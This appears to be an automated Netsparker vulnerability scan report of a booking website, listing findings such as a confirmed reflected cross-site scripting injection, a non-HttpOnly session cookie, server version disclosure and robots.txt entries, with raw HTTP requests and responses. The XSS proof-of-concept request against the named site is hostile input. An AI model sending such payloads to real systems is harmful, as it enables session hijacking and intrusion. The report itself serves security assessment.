During a Cross-site Scripting attack an attacker can read the cookie through document.cookie and use it to hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HttpOnly. (After this change, JavaScript will no longer be able to read them, so check first that no legitimate client-side code depends on doing so.)

Remedy

Mark the cookie as HttpOnly. This is an extra layer of defence against XSS, not a fix for it: script injected through an XSS flaw can still issue requests from inside the victim's browser, and the browser attaches the cookie to those requests whether or not script can read it. Tools such as XSS Tunnel automate exactly that, so the underlying Cross-site Scripting issues must still be fixed.

External References

- /bookings/booknowjstag.action

/bookings/booknowjstag.action CONFIRMED

http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1..

Identified Cookie

JSESSIONID

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1)//7010dea1bfa HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:58:47 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: JSESSIONID=yiybmdbkuia2.cb2;Path=/bookings
X-UA-Compatible: IE=7
Keep-Alive: timeout=10, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked



var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck, 100 );
}
}
var NL = '\n'
var sWrite = "";
document.writeln('<a href="http://www.genbook.com/bookings/slot/reservation/30134654?bookingSourceId=10009769d';alert(1)//7010dea1bfa" target="_blank"><img src="http://www.genbook.com/bookings/images/booknow.gif" width="100" height="34" alt="Make an Online Appointment" border="0"/></a>' + sWrite)
document.writeln('<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><br/>');
sWrite = '<script type="text/javascript">' + NL
sWrite += '_uacct="UA-1818709-3";' + NL
sWrite += '_udn="none";' + NL
sWrite += '_ulink=1;' + NL
sWrite += 'urchinCheck()' + NL
sWrite += '</script>' + NL
document.writeln(sWrite);

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /bookings/images/

/bookings/images/

http://www.genbook.com/bookings/images/

Extracted Version

2.2.3 (Red Hat)

Request

GET /bookings/images/ HTTP/1.1
Referer: http://www.genbook.com/bookings/images/booknow.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=yiybmdbkuia2.cb2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 26 Apr 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /bookings/images/on this server.</p><hr><address>Apache/2.2.3 (Red Hat) Server at www.genbook.com Port 80</address></body></html>

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /bookings/images/

/bookings/images/ CONFIRMED

http://www.genbook.com/bookings/images/

Request

GET /bookings/images/ HTTP/1.1
Referer: http://www.genbook.com/bookings/images/booknow.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=yiybmdbkuia2.cb2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 26 Apr 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /bookings/images/on this server.</p><hr><address>Apache/2.2.3 (Red Hat) Server at www.genbook.com Port 80</address></body></html>

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam engines and brute-force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications and remove person-specific e-mail addresses from the web site; where a contact channel is required, use submission forms for this purpose.

External References

- /about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html

/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html

http://www.genbook.com/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google..

Found E-mails

press@genbook.com

Request

GET /about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 03:06:31 GMT
ETag: "1f40055-4873-4a13ccb7e3bc0"
Accept-Ranges: bytes
Content-Length: 18547
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 00:59:15 GMT
X-UA-Compatible: IE=7
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <title>Genbook Customer Reviews Now Published to Google Places - Press Releases - Genbook</title> <link rel="stylesheet" type="text/css" media="all" href="/css/all.css" /> <!--[if lt IE 8]><link type="text/css" rel="stylesheet" href="/css/ie.css" /><![endif]--> <script type="text/javascript" src="/js/jquery-1.5.2.min.js"></script> <script type="text/javascript" src="/js/jquery-ui-1.8.11.min.js"></script> <script type="text/javascript" src="/js/cufon.js"></script> <script type="text/javascript" src="/js/cufon-fonts.js"></script> <script type="text/javaScript" src="/js/myap9.js"></script> <script type="text/javaScript" src="/js/partner.js"></script> <script type="text/javascript" src="/js/jquery.common.js"></script> </head> <body> <div class="hidden"> <a id="top"></a> <!-- Image Preloads --> <img src="/images/bg-login-form.png"/> </div> <!-- w1 --> <div class="w1"> <!-- header --> <div id="wrapper"> <!-- header --> <div id="header"> <p class="logo"><a href="/">Genbook</a></p> <!-- navigation-holder --> <div class="navigation-holder"> <!-- add-nav --> <ul class="add-nav"> <li><a class="sign-up" href="/manager/register"><span>Sign Up</span></a></li> <li><a class="log-in" href="#"><span>Log in</span></a> <div class="quick-login-form-holder"> <!-- login-form --> <form class="quick-login-form" method="post" action="/manager/login"> <fieldset> <input type="hidden" value="" name="os_destination" /> <label for="email">Email Address</label> <div class="text"> <input type="text" id="email" name="os_username" /> </div> <label for="password">Password</label> <div class="text"> <input type="password" id="password" name="os_password" /> </div> <!-- row --> <div class="row"> <input type="checkbox" id="check" class="check" value="true" 
name="os_cookie"/> <label for="check">Remember me on this computer </label> </div> <!-- row --> <div class="row"> <a href="/manager/forgotpassword">Forgot your password?</a> <input type="submit" class="submit" value="Sign In" /> </div> </fieldset> </form> </div> </li> </ul> <!-- nav --> <ul id="nav"> <li><a href="/how-it-works/">how&nbsp;it&nbsp;works</a></li> <li><a href="/features/">features</a></li> <li><a href="/pricing/">pricing</a></li> <li class="active"><a href="/about-genbook/">About</a></li> </ul> </div> </div> <!-- main-wrapper --> <div class="main-wrapper"> <!-- main --> <div id="main"> <div class="t"> <div class="b"> <!-- sidebar --> <div id="sidebar"> <div class="t"> <div class="b"> <h2 class="page-title">About</h2> <ul> <li><a href="/about-genbook/index.html"><span>Who is Genbook </span></a></li> <li><a href="/about-genbook/testimonials/"><span>Genbooker Testimonials</span></a></li> <li><a href="/about-genbook/news-product-reviews.html"><span>News &amp; Product Reviews</span></a></li> <li class="active"><a href="/about-genbook/press-releases/"><span>Press Releases</span></a></li> <li><a href="/about-genbook/partner-program.html"><span>Partner Program</span></a></li> <li><a href="/manager/contactus"><span>Contact Genbook</span></a></li> </ul> </div> </div> </div> <!-- content --> <div id="content" class="thin"> <div id="press-release"> <div class="title"> <h1>Genbook Customer Reviews<span>Now Published to Google Places</span></h1> </div> <div class="formatted release"> <p><strong>Major Enhancement Syndicates Local Business Reviews Across the Internet.</strong></p> <p><strong>SAN FRANCISCO - April 12, 2011 -</strong> Genbook, the leader in Hassle-Free Online Scheduling Software for small local businesses, today announced a major enhancement to its appointment scheduling application that will provide users (aka &ldquo;Genbookers&rdquo;) with more ways to simplify their lives and grow their businesses. 
After each appointment, Genbook automatically collects and publishes Reviews from actual and recent customers, who have scheduled their appointments online. Reviews are published to the Genbook Scheduling Webpage and now across the Internet to encourage new online appointments.</p> <p>&ldquo;Reviews are a great way to promote a business through the testimonials of their satisfied customers. Genbook optimizes all &ldquo;Genbook Customer Reviews&rdquo; for inclusion on Google Places and the other major search engines, ensuring our Genbookers are more likely to be found by new customers searching for their service online,&rdquo; said Rody Moore, CEO and Founder of Genbook.</p> <p>&ldquo;I love Genbook and my clients love it too! Genbook is the best receptionist ever. Automatically sends appointment reminders and requests to write Reviews of my service. And now, my Genbook Reviews are on Google Places!&rdquo; said Elke Von Freudenberg, the Model Brow Specialists, New York City.</p> <p>Genbook&rsquo;s Online Appointment Scheduling Software helps local businesses connect with existing customers and advertise their services to new customers searching on the Internet. </p> <p><strong>More Appointments, Less Hassles</strong></p> <p>Genbook provides sophisticated yet easy-to-use Online Appointment Scheduling Software for local businesses to help grow their revenues by turning website visitors into confirmed appointments. Genbook is the life-changing solution that frees businesses from the tiresome task of scheduling, and offers their customers the convenience of scheduling appointments online in real-time, 24x7.</p> <p><strong>The Leader in Online Appointment Scheduling Web Services </strong></p> <p>Genbook is the leading provider of Online Scheduling Software for Small Local Businesses in North America. Genbook&rsquo;s Hassle-Free Online Scheduling Software is used by hundreds of thousands of consumers and many thousands of small businesses to simplify their lives. 
Genbook has been recognized by many well-respected news outlets including The New York Times, Fortune Small Business, The Wall Street Journal, C|Net News, Information Week, CNN Money, and USA Today. Genbook was profiled in PCWorld Magazine&rsquo;s list of 52 Incredibly Useful Web Services as &ldquo;Top-Notch&rdquo; and &ldquo;Phenomenally Cool.&rdquo;</p> <p>Genbook, Inc. is a privately-held, venture capital-backed company headquartered in San Francisco, California. More information can be found at www.genbook.com. </p> <p>Press Contact: <a href="mailto:press@genbook.com">press@genbook.com</a>, +1 415 227-9903.</p> <p>Follow Genbook on <a href="http://twitter.com/genbookteam">Twitter</a> and Like Genbook on <a href="http://www.facebook.com/GENBOOK">Facebook</a>.</p> </div> </div> </div> </div> </div> </div> <!-- block-link --> <div class="block-link gap"> <div class="try-button-holder"><a href="/manager/register" class="try-button" title="Click here to find out how to try Genbook for FREE!">Try Genbook for FREE</a></div> <p>No Credit Card Required.</p> </div> </div> </div> <!-- start footer --> <div id="footer"> <p class="backtotop"><a href="#top" id="tothetop">Back to Top</a></p> <div class="footernav"> <div class="column small"> <h3><a href="/how-it-works/">How It Works</a></h3> <ul> <li><a href="/how-it-works/">Overview</a></li> <li><a href="/how-it-works/benefits.html">Benefits of Genbook</a></li> <li><a href="/how-it-works/tutorial-videos.html">Tutorial Videos</a></li> </ul> <ul> <li class="link"><a href="/manager/register">Sign Up</a></li> <li class="link"><a href="#" id="footer_login">Login</a></li> <li class="link"><a href="http://genbook.blogspot.com/">Support Blog</a></li> <li class="link"><a href="/legal/">Legal</a></li> <li class="link"><a href="/sitemap.html">Site Map</a></li> </ul> </div> <div class="column double"> <h3><a href="/how-it-works/who-uses-genbook/">Who Uses Genbook</a></h3> <ul> <li><a 
href="/how-it-works/who-uses-genbook/massage.html">Massage</a></li> <li><a href="/how-it-works/who-uses-genbook/salon.html">Salon</a></li> <li><a href="/how-it-works/who-uses-genbook/spa.html">Spa</a></li> <li><a href="/how-it-works/who-uses-genbook/wellness.html">Wellness</a></li> <li><a href="/how-it-works/who-uses-genbook/skin.html">Skin</a></li> <li><a href="/how-it-works/who-uses-genbook/acupuncture.html">Acupuncture</a></li> <li><a href="/how-it-works/who-uses-genbook/chiropractors.html">Chiropractors</a></li> </ul> <ul> <li><a href="/how-it-works/who-uses-genbook/counseling.html">Counseling</a></li> <li><a href="/how-it-works/who-uses-genbook/consulting.html">Consulting</a></li> <li><a href="/how-it-works/who-uses-genbook/financial.html">Financial</a></li> <li><a href="/how-it-works/who-uses-genbook/photography.html">Photography</a></li> <li><a href="/how-it-works/who-uses-genbook/medical.html">Medical</a></li> <li><a href="/how-it-works/who-uses-genbook/financial.html">Law</a></li> <li><a href="/how-it-works/who-uses-genbook/more.html">Many More</a></li> </ul> </div> <div class="column wide"> <h3><a href="/features/">Features</a></h3> <ul> <li><a href="/features/#hasslefree">Hassle-Free Online Scheduling</a></li> <li><a href="/features/#anywhereanytime">Genbook Anywhere Anytime</a></li> <li><a href="/features/#connect">Connect With Your Customers</a></li> <li><a href="/features/#customize">Customize Your Genbook</a></li> <li><a href="/features/#trusted">Trusted, Secure, Guaranteed</a></li> </ul> <h3><a href="/pricing/">Pricing</a></h3> </div> <div class="column small"> <h3><a href="/about-genbook/">About</a></h3> <ul> <li><a href="/about-genbook/">Who is Genbook</a></li> <li><a href="/about-genbook/testimonials/">Genbooker Testimonials</a></li> <li><a href="/about-genbook/news-product-reviews.html">News &amp; Product Reviews</a></li> <li><a href="/about-genbook/press-releases/">Press Releases</a></li> <li><a 
href="/about-genbook/partner-program.html">Partner Program</a></li> <li><a href="/manager/contactus">Contact Genbook</a></li> </ul> </div> </div> <div class="social"> <!-- social --> <ul> <li class="facebook"><a href="http://www.facebook.com/Genbook" rel="external">Like</a></li> <li class="twitter"><a href="http://twitter.com/GenbookTeam" rel="external">Follow</a></li> ..

Sitemap Identified

1 TOTAL
INFORMATION
Netsparker identified a Sitemap file on the target web site. This issue is reported as extra information.

Impact

This issue is reported as extra information; there is no direct impact resulting from it.
- /sitemap.xml

/sitemap.xml

http://www.genbook.com/sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:58:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 03:06:31 GMT
ETag: "1f4014c-355f42-4a13ccb7e3bc0"
Accept-Ranges: bytes
Content-Length: 3497794
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 00:58:49 GMT
X-UA-Compatible: IE=7
Content-Type: text/xml


<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url><loc>http://www.genbook.com</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/index.html</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/manager/register</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/sitemap.html</loc><changefreq>weekly</changefreq><priority>1.0</priority></url> <url><loc>http://www.genbook.com/manager/contactus</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/news-product-reviews.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/partner-program.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-launches-booknow-facebook-application.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-launches-genbook-mobile-optimized-for-the-iphone.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-makes-pcworld-magazines-list-of-incredibly-useful-sites.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-releases-multiple-calendar-view-feature.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> 
<url><loc>http://www.genbook.com/about-genbook/press-releases/genbook-schedules-the-coupon-wielding-hordes.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/press-releases/online-appointment-scheduling-is-a-competitive-necessity.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-2.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-3.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-4.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-5.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-6.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/about-genbook/testimonials/page-7.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/features/daily-deal-ready.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/features/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/benefits.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> 
<url><loc>http://www.genbook.com/how-it-works/tutorial-videos.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/acupuncture.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/chiropractors.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/consulting.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/counseling.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/financial.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/massage.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/medical.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/more.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/photography.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/salon.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/skin.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> 
<url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/spa.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/how-it-works/who-uses-genbook/wellness.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/legal/consumer.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/legal/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/legal/privacy.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/pricing/index.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/pricing/details.html</loc><changefreq>weekly</changefreq><priority>0.7</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011683</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011798</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012076</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011204</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011208</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011213</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011296</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011392</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> 
<url><loc>http://www.genbook.com/bookings/slot/reservation/30011398</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011415</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011876</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012166</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012149</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010918</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010843</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010845</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010846</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010864</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011434</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011920</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011922</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012112</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> 
<url><loc>http://www.genbook.com/bookings/slot/reservation/30010716</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011437</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011628</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011632</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011890</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010900</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010944</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010962</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011366</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011499</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011893</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011994</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011821</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30012013</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> 
<url><loc>http://www.genbook.com/bookings/slot/reservation/30011087</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011124</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011511</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011505</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011553</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011852</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/141498</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/152407</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/182796</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011550</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011895</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011945</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/276569</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011179</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> 
<url><loc>http://www.genbook.com/bookings/slot/reservation/30011568</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011529</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010661</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30010889</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011526</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011565</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/slot/reservation/30011726</loc><changefreq>weekly</changefreq><priority>0.5</priority></url> <url><loc>http://www.genbook.com/bookings/..

Robots.txt Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that nothing sensitive, such as the path of the administration panel, is exposed within this file.

Remedy

  • If disallowed paths are sensitive, do not list them in robots.txt, and ensure that they are correctly protected by means of authentication.
- /robots.txt

/robots.txt CONFIRMED

http://www.genbook.com/robots.txt

Interesting Robots.txt Entries

  • Sitemap: http://www.genbook.com/sitemap.xml
  • User-agent: *
  • Disallow: /bookings/slot/reservation/*?*method=put
  • Disallow: /bookings/slot/reservation/30071103/39929633
  • Disallow: /bookings/slot/reservation/30071103/39929633/*

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 19 Apr 2011 03:06:31 GMT
ETag: "1f40043-de-4a13ccb7e3bc0"
Accept-Ranges: bytes
Content-Length: 222
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 00:59:00 GMT
X-UA-Compatible: IE=7
Content-Type: text/plain; charset=UTF-8


Sitemap: http://www.genbook.com/sitemap.xml
User-agent: *
